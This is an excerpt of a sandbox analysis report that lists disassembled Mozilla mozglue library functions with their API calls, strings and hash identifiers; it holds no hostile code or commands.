                                                                                                      • Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                      • Instruction Fuzzy Hash: 83221875F0461A8FCB14CF98C890AAEF7B2FF88304F548599D44AA7705D771A986CF81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6D00AC00 Relevance: .4, Instructions: 445COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c9970ccd4f214dcbf5bfba6659cf8c66e35eaee460deeab104b357eaf5cd9bb1
                                                                                                      • Instruction ID: 012a539029547b951e4457e9f95ec3fcc4cd56e2e3ad17581460bdbf9a191439
                                                                                                      • Opcode Fuzzy Hash: c9970ccd4f214dcbf5bfba6659cf8c66e35eaee460deeab104b357eaf5cd9bb1
                                                                                                      • Instruction Fuzzy Hash: 34F13971A087466FF700CF68C890BBEB7E2AFC9314F258A2DE5D587381E77498458782
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CF9C670 Relevance: .3, Instructions: 285COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
                                                                                                      • Instruction ID: a397220ff2e2e289efda3ea0b1e4980128e593a59d5486ce34578a48392f0189
                                                                                                      • Opcode Fuzzy Hash: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
                                                                                                      • Instruction Fuzzy Hash: 4CA19171F0061A8BEF08CE69C8913AEB7F2AFC9354F198169D919E7781D7345D068BD0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFF55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(user32,?,6CFCE1A5), ref: 6CFF5606
                                                                                                      • LoadLibraryW.KERNEL32(gdi32,?,6CFCE1A5), ref: 6CFF560F
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CFF5633
                                                                                                      • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CFF563D
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CFF566C
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CFF567D
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CFF5696
                                                                                                      • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CFF56B2
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CFF56CB
                                                                                                      • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CFF56E4
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CFF56FD
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CFF5716
                                                                                                      • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CFF572F
                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CFF5748
                                                                                                      • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CFF5761
                                                                                                      • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CFF577A
                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CFF5793
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CFF57A8
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CFF57BD
                                                                                                      • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CFF57D5
                                                                                                      • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CFF57EA
                                                                                                      • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CFF57FF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                      • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                      • API String ID: 2238633743-1964193996
                                                                                                      • Opcode ID: 628ec85c608bd5b3e44dbabe1f14442a9027a415b3c13b5027f6aedf40affa77
                                                                                                      • Instruction ID: 505465d0c14856629295f5b5d3ec5de10dbea4b19c33748bf897e9a36fd36d84
                                                                                                      • Opcode Fuzzy Hash: 628ec85c608bd5b3e44dbabe1f14442a9027a415b3c13b5027f6aedf40affa77
                                                                                                      • Instruction Fuzzy Hash: 25514C71509706ABEF005FB58D49B3A3EFDBB17345B108029A935E2A93EB74C801CF61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFDCC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6CFA582D), ref: 6CFDCC27
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6CFA582D), ref: 6CFDCC3D
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6D00FE98,?,?,?,?,?,6CFA582D), ref: 6CFDCC56
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6CFA582D), ref: 6CFDCC6C
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6CFA582D), ref: 6CFDCC82
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6CFA582D), ref: 6CFDCC98
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6CFA582D), ref: 6CFDCCAE
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6CFDCCC4
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6CFDCCDA
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6CFDCCEC
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6CFDCCFE
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6CFDCD14
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6CFDCD82
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6CFDCD98
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6CFDCDAE
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6CFDCDC4
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6CFDCDDA
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6CFDCDF0
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6CFDCE06
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6CFDCE1C
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6CFDCE32
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6CFDCE48
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6CFDCE5E
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6CFDCE74
                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6CFDCE8A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strcmp
                                                                                                      • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                      • API String ID: 1004003707-2809817890
                                                                                                      • Opcode ID: 22327176af09677467ebceef8ee596000f86aeb98c9c743fb6242b11abd07589
                                                                                                      • Instruction ID: ce82279ef7a196452677c972554096739c59323eb8df6698aee3d71ae6f715c2
                                                                                                      • Opcode Fuzzy Hash: 22327176af09677467ebceef8ee596000f86aeb98c9c743fb6242b11abd07589
                                                                                                      • Instruction Fuzzy Hash: 0651D8C2A4D22532FA0075166D10B7B5A0DDF1334AF2A403AFE2DA29C1FF15B31586BB
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFA4470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFA4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CFA44B2,6D01E21C,6D01F7F8), ref: 6CFA473E
                                                                                                        • Part of subcall function 6CFA4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CFA474A
                                                                                                      • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6CFA44BA
                                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6CFA44D2
                                                                                                      • InitOnceExecuteOnce.KERNEL32(6D01F80C,6CF9F240,?,?), ref: 6CFA451A
                                                                                                      • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CFA455C
                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 6CFA4592
                                                                                                      • InitializeCriticalSection.KERNEL32(6D01F770), ref: 6CFA45A2
                                                                                                      • moz_xmalloc.MOZGLUE(00000008), ref: 6CFA45AA
                                                                                                      • moz_xmalloc.MOZGLUE(00000018), ref: 6CFA45BB
                                                                                                      • InitOnceExecuteOnce.KERNEL32(6D01F818,6CF9F240,?,?), ref: 6CFA4612
                                                                                                      • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6CFA4636
                                                                                                      • LoadLibraryW.KERNEL32(user32.dll), ref: 6CFA4644
                                                                                                      • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CFA466D
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA469F
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA46AB
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA46B2
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA46B9
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA46C0
                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CFA46CD
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 6CFA46F1
                                                                                                      • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6CFA46FD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                      • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                      • API String ID: 1702738223-3894940629
                                                                                                      • Opcode ID: b5b9876cbb97da79a1029d8fd6324eb4d2880daf1920fa9a96ca7ea21d621b70
                                                                                                      • Instruction ID: 10932c0d0faf7270372a384a0cca796d4631af354b603720b853e0900446e7c2
                                                                                                      • Opcode Fuzzy Hash: b5b9876cbb97da79a1029d8fd6324eb4d2880daf1920fa9a96ca7ea21d621b70
                                                                                                      • Instruction Fuzzy Hash: C561C2B1908244EFFB009FE5CC0ABA5BFB8EB46308F048158E5189B691DBB18946CF52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFDF6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CFA4A68), ref: 6CFD945E
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CFD9470
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CFD9482
                                                                                                        • Part of subcall function 6CFD9420: __Init_thread_footer.LIBCMT ref: 6CFD949F
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF70E
                                                                                                      • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6CFDF8F9
                                                                                                        • Part of subcall function 6CFA6390: GetCurrentThreadId.KERNEL32 ref: 6CFA63D0
                                                                                                        • Part of subcall function 6CFA6390: AcquireSRWLockExclusive.KERNEL32 ref: 6CFA63DF
                                                                                                        • Part of subcall function 6CFA6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6CFA640E
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDF93A
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF98A
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF990
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFDF994
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFDF716
                                                                                                        • Part of subcall function 6CFD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CFD94EE
                                                                                                        • Part of subcall function 6CFD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CFD9508
                                                                                                        • Part of subcall function 6CF9B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6CF9B5E0
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF739
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDF746
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDF793
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6D01385B,00000002,?,?,?,?,?), ref: 6CFDF829
                                                                                                      • free.MOZGLUE(?,?,00000000,?), ref: 6CFDF84C
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6CFDF866
                                                                                                      • free.MOZGLUE(?), ref: 6CFDFA0C
                                                                                                        • Part of subcall function 6CFA5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CFA55E1), ref: 6CFA5E8C
                                                                                                        • Part of subcall function 6CFA5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CFA5E9D
                                                                                                        • Part of subcall function 6CFA5E60: GetCurrentThreadId.KERNEL32 ref: 6CFA5EAB
                                                                                                        • Part of subcall function 6CFA5E60: GetCurrentThreadId.KERNEL32 ref: 6CFA5EB8
                                                                                                        • Part of subcall function 6CFA5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CFA5ECF
                                                                                                        • Part of subcall function 6CFA5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6CFA5F27
                                                                                                        • Part of subcall function 6CFA5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6CFA5F47
                                                                                                        • Part of subcall function 6CFA5E60: GetCurrentProcess.KERNEL32 ref: 6CFA5F53
                                                                                                        • Part of subcall function 6CFA5E60: GetCurrentThread.KERNEL32 ref: 6CFA5F5C
                                                                                                        • Part of subcall function 6CFA5E60: GetCurrentProcess.KERNEL32 ref: 6CFA5F66
                                                                                                        • Part of subcall function 6CFA5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CFA5F7E
                                                                                                      • free.MOZGLUE(?), ref: 6CFDF9C5
                                                                                                      • free.MOZGLUE(?), ref: 6CFDF9DA
                                                                                                      Strings
                                                                                                      • " attempted to re-register as ", xrefs: 6CFDF858
                                                                                                      • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6CFDF9A6
                                                                                                      • Thread , xrefs: 6CFDF789
                                                                                                      • [D %d/%d] profiler_register_thread(%s), xrefs: 6CFDF71F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                                      • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                                      • API String ID: 882766088-1834255612
                                                                                                      • Opcode ID: c995e7f7b125777e6ffc2962da696aa11a01b7f613e9a1e91483b6cfc9151773
                                                                                                      • Instruction ID: 5dd02ab0c04d6a35b36fd056f3da45afabdb1fb088b1c1c1d75217c0daf63b04
                                                                                                      • Opcode Fuzzy Hash: c995e7f7b125777e6ffc2962da696aa11a01b7f613e9a1e91483b6cfc9151773
                                                                                                      • Instruction Fuzzy Hash: 1B8113719043009FEB11DFA5CC40BAABBA5EF85308F49452DE8599B751EB30A949CB93
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFDEE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CFA4A68), ref: 6CFD945E
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CFD9470
                                                                                                        • Part of subcall function 6CFD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CFD9482
                                                                                                        • Part of subcall function 6CFD9420: __Init_thread_footer.LIBCMT ref: 6CFD949F
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDEE60
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDEE6D
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDEE92
                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CFDEEA5
                                                                                                      • CloseHandle.KERNEL32(?), ref: 6CFDEEB4
                                                                                                      • free.MOZGLUE(00000000), ref: 6CFDEEBB
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDEEC7
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFDEECF
                                                                                                        • Part of subcall function 6CFDDE60: GetCurrentThreadId.KERNEL32 ref: 6CFDDE73
                                                                                                        • Part of subcall function 6CFDDE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CFA4A68), ref: 6CFDDE7B
                                                                                                        • Part of subcall function 6CFDDE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CFA4A68), ref: 6CFDDEB8
                                                                                                        • Part of subcall function 6CFDDE60: free.MOZGLUE(00000000,?,6CFA4A68), ref: 6CFDDEFE
                                                                                                        • Part of subcall function 6CFDDE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CFDDF38
                                                                                                        • Part of subcall function 6CFCCBE8: GetCurrentProcess.KERNEL32(?,6CF931A7), ref: 6CFCCBF1
                                                                                                        • Part of subcall function 6CFCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CF931A7), ref: 6CFCCBFA
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDEF1E
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDEF2B
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDEF59
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDEFB0
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDEFBD
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFDEFE1
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFDEFF8
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFDF000
                                                                                                        • Part of subcall function 6CFD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CFD94EE
                                                                                                        • Part of subcall function 6CFD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CFD9508
                                                                                                      • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CFDF02F
                                                                                                        • Part of subcall function 6CFDF070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CFDF09B
                                                                                                        • Part of subcall function 6CFDF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6CFDF0AC
                                                                                                        • Part of subcall function 6CFDF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6CFDF0BE
                                                                                                      Strings
                                                                                                      • [I %d/%d] profiler_pause, xrefs: 6CFDF008
                                                                                                      • [I %d/%d] profiler_stop, xrefs: 6CFDEED7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
